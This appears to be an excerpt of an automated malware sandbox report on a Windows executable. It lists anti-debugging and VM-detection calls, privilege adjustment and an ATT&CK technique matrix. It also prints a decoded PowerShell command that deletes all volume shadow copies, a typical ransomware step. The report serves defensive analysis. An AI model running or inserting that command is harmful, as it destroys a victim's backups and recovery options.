        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5504Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_004070C1 FindFirstFileExW,FindFirstFileW,FindNextFileW,FindClose,0_2_004070C1
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_001C7311 FindFirstFileExW,FindFirstFileW,FindNextFileW,FindClose,0_2_001C7311
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_00404FDB GetSystemInfo,0_2_00404FDB
        Source: HAjXCphNj5.exe, 00000000.00000002.1223906621.0000000003F00000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
        Source: HAjXCphNj5.exe, 00000000.00000002.1223906621.0000000003F00000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
        Source: HAjXCphNj5.exe, 00000000.00000002.1223906621.0000000003F00000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
        Source: HAjXCphNj5.exe, 00000000.00000002.1223906621.0000000003F00000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_004054F0 rdtsc 0_2_004054F0
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_00404C8C mov eax, dword ptr fs:[00000030h]0_2_00404C8C
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_00404FF2 mov ecx, dword ptr fs:[00000030h]0_2_00404FF2
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_001C5242 mov ecx, dword ptr fs:[00000030h]0_2_001C5242
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_001C4EDC mov eax, dword ptr fs:[00000030h]0_2_001C4EDC
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_001C092B mov eax, dword ptr fs:[00000030h]0_2_001C092B
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_001C0D90 mov eax, dword ptr fs:[00000030h]0_2_001C0D90
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_00404409 HeapCreate,GetProcessHeap,0_2_00404409
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Encrypted powershell cmdline option foundShow sources
        Source: unknownProcess created: Base64 decoded Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeProcess created: Base64 decoded Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}Jump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: OpenProcess,QueryFullProcessImageNameW,PathFindFileNameW, svchost.exe0_2_004045C2
        Source: HAjXCphNj5.exe, 00000000.00000002.1222996351.0000000001550000.00000002.00000001.sdmp, unsecapp.exe, 00000007.00000002.1221833599.000001D99FAA0000.00000002.00000001.sdmpBinary or memory string: Program Manager
        Source: HAjXCphNj5.exe, 00000000.00000002.1222996351.0000000001550000.00000002.00000001.sdmp, unsecapp.exe, 00000007.00000002.1221833599.000001D99FAA0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
        Source: HAjXCphNj5.exe, 00000000.00000002.1222996351.0000000001550000.00000002.00000001.sdmp, unsecapp.exe, 00000007.00000002.1221833599.000001D99FAA0000.00000002.00000001.sdmpBinary or memory string: Progman
        Source: HAjXCphNj5.exe, 00000000.00000002.1222996351.0000000001550000.00000002.00000001.sdmp, unsecapp.exe, 00000007.00000002.1221833599.000001D99FAA0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_004046E2 cpuid 0_2_004046E2
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_00404D32 GetUserNameW,0_2_00404D32

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Replication Through Removable Media1Windows Management Instrumentation1Modify Existing Service1Process Injection12Software Packing23Credential DumpingPeripheral Device Discovery11Replication Through Removable Media1Data from Local SystemData Encrypted1Standard Cryptographic Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
        Replication Through Removable MediaPowerShell1Port MonitorsAccessibility FeaturesDeobfuscate/Decode Files or Information1Network SniffingAccount Discovery1Remote ServicesData from Removable MediaExfiltration Over Other Network MediumConnection Proxy1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDefacement1
        External Remote ServicesService Execution1Accessibility FeaturesPath InterceptionObfuscated Files or Information2Input CaptureSecurity Software Discovery121Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationCustom Cryptographic ProtocolExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Drive-by CompromiseScheduled TaskSystem FirmwareDLL Search Order HijackingMasquerading3Credentials in FilesSystem Service Discovery1Logon ScriptsInput CaptureData EncryptedMultiband CommunicationSIM Card SwapPremium SMS Toll Fraud
        Exploit Public-Facing ApplicationCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessVirtualization/Sandbox Evasion2Account ManipulationFile and Directory Discovery1Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceProcess Injection12Brute ForceSystem Information Discovery25Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
        Spearphishing AttachmentScriptingPath InterceptionScheduled TaskConnection Proxy1Two-Factor Authentication InterceptionVirtualization/Sandbox Evasion2Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionIndicator BlockingBash HistoryProcess Discovery3Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Supply Chain CompromiseRundll32DLL Search Order HijackingService Registry Permissions WeaknessProcess InjectionInput PromptApplication Window Discovery1Windows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer EncryptionRogue Cellular Base StationData Destruction
        Trusted RelationshipPowerShellChange Default File AssociationExploitation for Privilege EscalationScriptingKeychainSystem Owner/User Discovery1Taint Shared ContentAudio CaptureCommonly Used PortConnection ProxyData Encrypted for Impact

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.